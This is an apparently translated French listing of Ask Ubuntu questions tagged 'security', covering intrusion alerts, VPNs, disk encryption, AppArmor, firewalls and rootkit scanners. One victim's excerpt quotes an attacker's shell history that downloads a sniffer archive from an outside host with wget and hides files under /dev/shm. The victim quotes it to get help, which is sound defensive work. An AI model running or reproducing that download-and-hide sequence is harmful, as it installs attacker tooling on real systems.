Ubuntu security

3

Quelle configuration de notification / détection d'intrusion automatisée est bonne pour une utilisation à domicile?

J'utilise Linux depuis un certain temps maintenant et je ressens toujours le besoin d'avoir une configuration passive de logiciel / script qui peut m'alerter de toute activité réseau suspecte comme des analyses, des tentatives de connexion échouées, etc. à la volée par e-mail ou par notifications visuelles / audio. Je …

27 software-recommendation security firewall logs

3

Quels fournisseurs VPN gratuits prennent en charge Ubuntu?

Impossible de trouver un fournisseur VPN gratuit pour Ubuntu. J'ai essayé d'étudier de vieilles questions, mais elles semblent obsolètes.

27 security vpn privacy

2

Authentification à deux facteurs Yubikey Cryptage complet du disque via LUKS

J'ai récemment acquis un Yubikey Neo - un astucieux petit dispositif d'authentification de second facteur matériel. Il est principalement destiné à être utilisé avec des mots de passe à usage unique et le protocole U2F émergent - mais depuis la version 2 de Yubikey, il prend également en charge l'authentification …

27 password security encryption luks yubikey

2

Est-ce une mauvaise idée d'exécuter SELinux et AppArmor en même temps?

Ma politique d'entreprise stipule que les boîtes Linux doivent être sécurisées avec SELinux (afin qu'un auditeur de sécurité puisse cocher la case «oui, nous sommes extrêmement sécurisés!» Pour chaque serveur). J'avais espéré profiter de la formidable sécurité AppArmor par défaut d'Ubuntu. Est-il imprudent d'exécuter à la fois Apparmor et SELinux? …

27 security permissions apparmor

5

Existe-t-il un pare-feu préinstallé ou automatique?

Ubuntu est-il fourni avec un pare-feu préinstallé ou automatique? Sinon, en ai-je besoin? J'ai lu quelques articles sur les avantages de Linux par rapport aux autres systèmes d'exploitation en matière de sécurité (pas besoin d'antivirus, ...) mais j'aimerais en être sûr.

26 security firewall

6

Ordinateur personnel piraté: comment empêcher cet utilisateur de se reconnecter? Comment savoir comment ils se connectent?

Je suis sûr à 99,9% que mon système sur mon ordinateur personnel a été infiltré. Permettez-moi d'abord de donner mon raisonnement pour que la situation soit claire: Chronologie approximative de l'activité suspecte et des mesures ultérieures prises: 4-26 23:00 J'ai terminé tous les programmes et fermé mon ordinateur portable. 4-27 …

25 ssh security passwd-file

4

chkrootkit affiche «tcpd» comme INFECTED. Est-ce un faux positif?

L'analyse par chkrootkit montre que "tcpd" est INFECTE. Bien qu'un scan par rkhunter montre ok, (sauf pour les faux positifs réguliers) Dois-je m'inquiéter? (Je suis sur Ubuntu 16.10 avec 4.8.0-37-générique)

25 security malware rootkit tcpdump chkrootkit

5

Quelle est l'importance du mot de passe sudo?

Je sais que le mot de passe sudo protège mon ordinateur contre le piratage local par quelqu'un y ayant un accès physique ( modifier: en fait, il ne le fait pas ). Mon mot de passe est assez fort à cet effet, mais je sais qu'il n'est pas assez fort …

25 password sudo security

6

Comment puis-je confirmer que les binaires de mon Ubuntu proviennent du code source dont ils devraient provenir?

Comme 99% des utilisateurs, j'installe Ubuntu à partir de binaires prêts à l'emploi. Comment puis-je vérifier moi-même que ces fichiers binaires proviennent bien du code source d'origine d'Ubuntu? Il serait bon de vérifier que la NSA / quelqu'un n'a pas collaboré avec Ubuntu ou Linode (mon fournisseur VPS) pour jouer …

25 security

1

avertissement de rkhunter à propos de /etc/.java /etc/.udev /etc/.initramfs

J'utilise Ubuntu 10.04.1 LTS. J'utilise rkhunter pour vérifier les rootkits. rkhunter se plaint des fichiers et répertoires cachés suivants. Je pense que ces fichiers ne sont pas un vrai problème sur mon système, mais comment puis-je vérifier si ces fichiers sont des fichiers légitimes? [07:57:45] Checking for hidden files and …

25 10.04 security rkhunter

2

Trouvé Backdoor SSH sur VServer. Que faire?

Hier, j'ai vérifié mon historique de commandes sur mon VServer. J'ai trouvé plusieurs lignes suspectes. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " …

24 ssh security malware

2

La mise à niveau de la méta-version (do-release-upgrade) est-elle sécurisée?

J'essaie de comprendre le do-release-upgradeprocessus, c'est-à-dire la façon dont Ubuntu me demande de passer à la prochaine version d'Ubuntu au printemps ou à l'automne. Après avoir lu les sources de, ubuntu-release-upgraderj'ai trouvé le fichier / etc / update-manager / meta-release sur mon système. Ce fichier semble utiliser une URL HTTP …

24 security do-release-upgrade

2

Comment puis-je savoir que l'apparmeur fonctionne?

Quelques questions auxquelles je veux répondre dans la réponse: Comment savoir si l'apparmeur est en cours d'exécution? Comment savoir si cela fonctionne bien?

24 security apparmor

2

Comment le système est-il sécurisé?

Je comprends que si un logiciel malveillant fait son chemin dans un système Linux, il obtiendra tout au plus un privilège au niveau de l'utilisateur et ruinera tout ce qui est à la portée de l'utilisateur particulier, c'est-à-dire ses propres fichiers. Mais qu'est-ce qui empêche exactement les malwares d'accéder au …

24 security

2

Quel est l'apt équivalent à «rpm -V» (Vérifier les packages installés)

Sur un système RedHat / CentOS, je peux vérifier les RPM installés sur mon système en utilisant rpm -V . Qu'est-ce que Ubuntu ou l' aptéquivalent de cette commande?

24 security apt rpm deb

Questions marquées «security»